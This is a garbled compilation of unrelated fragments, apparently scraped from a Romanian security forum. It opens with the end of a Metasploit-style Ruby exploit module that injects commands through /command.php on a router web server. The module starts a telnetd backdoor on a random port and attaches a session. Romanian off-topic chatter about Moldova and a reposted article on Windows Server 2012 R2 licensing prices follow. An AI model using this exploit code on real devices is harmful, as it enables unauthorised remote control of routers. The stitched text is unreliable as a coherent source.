print_status("#{rhost}:#{rport} - Sending exploit request...") res = request(cmd) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end if res.body.include?("end") print_good("#{rhost}:#{rport} - Exploited successfully\n") vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") vprint_line("#{rhost}:#{rport} - Output: #{res.body}") else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end return end def exploit_telnet telnetport = rand(65535) print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") cmd = "telnetd -p #{telnetport}" #starting the telnetd gives no response print_status("#{rhost}:#{rport} - Sending exploit request...") request(cmd) begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") add_socket(sock) else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" auth_info = { :host => rhost, :port => telnetport, :sname => 'telnet', :user => "", :pass => "", :source_type => "exploit", :active => true } report_auth_info(auth_info) merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => nil, 'PASSWORD' => nil } start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service") end return end def request(cmd) uri = '/command.php' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "cmd" => cmd } }) return res rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end end
-
Totusi, era intr-adevar mare nevoie sa se faca topic pe RST ca n-are Moldova semnal la telefon. Poate faceti si cand nu va curge apa. // Facem un pact. Incheiem discutia, problema probabil s-a rezolvat, Moldova are semnal deci pachetele pe tren vor fi trimise la timp.Se creeaza off-topic aiurea.
-
Microsoft is cranking up the price of its Datacenter edition of Windows Server 2012 for the forthcoming R2 release – it's up a whopping 28 per cent on today's price tag. The Windows Server 2012 R2 Datacenter edition, which offers unlimited virtualisation rights, will cost $6,155, according to the new licensing data sheet [PDF]. The Datacenter edition for today's Windows Server 2012 costs $4,809. Customers using Windows Server 2012 with an active Software Assurance (SA) coverage will get a “transitional license” to use the R2 update, so should - theoretically - pay no more. As ever, you’ll have to pay for Client Access Licenses on top of the price to allow users to access the server. The price of the Standard edition for the next version of Microsoft’s Server product remains unchanged at $882. Standard edition provides just two virtual instances – which Microsoft has rebranded as "operating system environments", or OSEs – per licence. The price of the Essentials edition is also unchanged at $501. News of the long-awaited licensing changes was flagged up by MVP Aidan Finn based in Dublin, Ireland, who first spotted the new, price-altered datasheets on Redmond's Windows Server 2012 R2 page. Microsoft hasn't spoken officially about the new pricing. And no wonder. The Windows Server jump caps a record year for Microsoft according to veteran Redmond licensing expert Paul DeGroot. He claimed in a tweet yesterday that 2013 had seen "a record number of price increases" from Microsoft. Microsoft in April hiked the bill for BizTalk Server customers by dumping the per-CPU charge for a per-core fee in Server 2013. The price hike is a sucker-punch but no one can argue that they haven't been getting all that Hyper-V virtualisation for nothing from Microsoft all these years. Microsoft pitches the Windows Server 2012 R2 as being built for “highly virtualized private cloud environments”. Clearly it wants to steer big businesses towards the Datacenter edition, by setting the cut-off limit of "OSEs" in the Standard edition at just two. It’s the only real differentiating feature between the two, based on a comparison chart in the appendix of Microsoft’s licensing data sheet. Windows Server 2012 R2 is expected by the end of this calendar year. ® Sursa TheRegister.co.uk
-
Poate m-am facut inteles gresit, n-am nimic cu Moldova, am ceva de criticat la comportamentul lor, precum si cel al rusilor si cel al ungurilor.